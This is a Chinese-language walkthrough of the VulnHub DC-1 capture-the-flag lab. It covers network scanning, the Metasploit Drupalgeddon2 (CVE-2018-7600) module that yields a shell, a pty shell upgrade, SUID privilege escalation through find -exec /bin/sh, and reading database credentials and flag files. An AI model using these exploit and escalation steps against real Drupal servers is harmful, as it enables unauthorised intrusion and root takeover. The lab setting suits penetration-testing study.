当前位置: 首页 > news >正文

DC‑1 靶机完整渗透思路 + 详细步骤(可直接复现)

核心思路:信息收集 → Drupal 远程代码执行 → 拿 Webshell → 数据库信息利用 → SUID 提权 → 拿 Root 与全部 Flag


一、环境准备

  • 攻击机:Kali Linux(NAT 模式)
  • 靶机:DC‑1(VulnHub 下载,NAT 模式)
  • 目标:拿下root 权限+ 找到5 个 flag

二、信息收集(定位靶机 + 端口服务)

1. 查看攻击机 IP

ifconfig

2. 网段扫描找靶机 IP

arp-scan -l

3. 端口与服务扫描

nmap -A -T4 192.168.146.133

开放端口:

  • 22/tcp SSH
  • 80/tcp HTTP(Drupal 7 CMS)
  • 111/tcp rpcbind

关键发现:80 端口跑 Drupal 7,存在 CVE‑2018‑7600(Drupalgeddon2)远程代码执行漏洞


三、漏洞利用(MSF 拿 Shell)

1. 启动 Metasploit

msfconsole

2. 搜索并加载漏洞模块

search drupal # 选择第1个:exploit/unix/webapp/drupal_drupalgeddon2 use 1

3. 设置参数并执行

1. set rhosts 192.168.146.128 # 靶机IP 2. set lhost 192.168.46.133 # 攻击机IP 3. run

成功拿到Meterpreter 会话,用户为www‑data(低权限)


四、升级交互式 Shell

1. shell 2. python -c "import pty;pty.spawn('/bin/bash')"

得到稳定 bash:www-data@DC-1:/var/www$(这行命令是在渗透测试中,把一个 “残缺的反向 Shell 升级成交互式 Bash” 的经典操作)

💡 为什么要这么做?

你刚拿到的 Meterpreter / 反弹 Shell 有很多限制:

  • 无法使用su/sudo切换用户
  • 无法运行vim/top这类需要终端的程序
  • 输入错误命令时,Ctrl+C会直接把整个会话关掉
  • 没有命令行历史记录、Tab 补全

执行这行命令后,你会得到一个稳定的交互式 Shell,能正常使用这些功能,后面提权、操作靶机都会顺畅很多。


五、SUID 提权(获取 root 权限)

  1. 查找带 SUID 权限的可执行文件

    find / -perm -u=s -type f 2>/dev/null

    关键发现:/usr/bin/find带有 SUID 权限,可用于提权。

  2. 利用 find 命令提权

    # 创建临时文件 touch test.txt # 利用find执行/bin/sh获取root shell find . -name test.txt -exec /bin/sh \; # 验证权限 whoami

    输出root即提权成功,终端提示符变为#


六、一次性获取全部 5 个 Flag

Flag 1(Web 根目录)

cd /var/www ls cat flag1.txt

Flag 2(Drupal 配置文件)

# 进入配置文件目录 cd /var/www/sites/default/ # 精准查看数据库信息和flag2 grep -E "database|username|password|flag" settings.php

文件中包含数据库账号密码,以及 Flag2 内容。

关键信息:

  • 数据库名:drupaldb
  • 用户名:dbuser
  • 密码:R0ck3t
  • 直接输出 flag2 内容

Flag 3(MySQL 数据库)

  1. 登录数据库

    mysql -u dbuser -pR0ck3t drupaldb
  2. 查看 users 表内容,获取 flag3

    -- 查看所有表 show tables; -- 查看users表的完整内容(按行显示,方便阅读) select * from users\G

    输出内容中包含 flag3 的提示信息。

  3. 退出数据库

    exit


Flag 4(普通用户目录)

cat /home/flag4/flag4.txt

直接读取 flag4 内容。


Flag 5(Root 目录最终 Flag)

cat /root/thefinalflag.txt

获取最终通关 Flag,内容为 DC-1 的通关祝贺信息。

http://www.jsqmd.com/news/717991/

相关文章:

  • 原力企业虾城市巡游——武汉站本周启幕!
  • 有没有懂电脑的
  • Hypnos-i1-8B开发环境配置:VSCode远程连接与调试教程
  • 文生图模型迭代洞察:共性与差异视角下,GPT-Image-2 的技术优势拆解
  • 429超过接口限频次数
  • LFM2.5-1.2B-Instruct实战指南:Gradio界面添加语音输入/输出扩展接口
  • XUnity.AutoTranslator:三步快速上手,轻松实现Unity游戏实时翻译
  • 2026年杭州有官方授权的小红书代运营机构费用多少钱 - 工业推荐榜
  • 盘点全球十大海底光缆,数字孪生赋能资产展示
  • GMI Cloud Inference Engine × OpenCode 配置秘籍奉上,拿捏 AI Coding!
  • 05华夏之光永存・开源:黄大年茶思屋榜文解法「23期 5题」 【分布式收发机设计专项完整解法】
  • 深聊2026年无人值守称重系统选购,郑州哪家公司口碑佳 - 工业推荐榜
  • 从效应思考一切
  • 表面贴装电阻热管理:原理、优化与实践
  • 终极指南:3步构建你的Windows微信智能助手,工作效率提升300%
  • Sliding Window(滑动窗口)
  • AI MV 高清无水印生成工具有哪些?零基础在线把歌曲做成 MV 的工具选择指南
  • 【稀缺首发】2024 Dev Containers兼容性矩阵图:Node.js 20/Python 3.12/Rust 1.78全版本支持状态+已验证镜像清单
  • 通过受管控的控制平面加速商品陈列优化
  • Cache映射计算
  • 2026年热门会议纪要神器实测对比转写整理全维度比拼,差距竟然这么大
  • 树莓派打造信息亭或工控面板?深度评测5款虚拟键盘(Matchbox/XVKBD等)的稳定性与定制化
  • Rust 操作 Redis 从入门到生产级应用
  • 5分钟终极指南:FF14过场动画跳过插件高效使用全解析
  • 记忆碎片化测试标准:软件测试领域的新兴挑战与应对框架
  • 测试架构师养成记:技术深度与广度的平衡术
  • 【含最新安装包】小龙虾 AI OpenClaw v2.6.6 安装指南|办公自动化神器
  • 告别HIDL编译怪错:详解Android 14中sparse image与raw image的转换陷阱与正确mount姿势
  • 地磅专用光幕价格为何差异这么大
  • 为什么禁止我请求别的网站的接口?——跨域与CORS _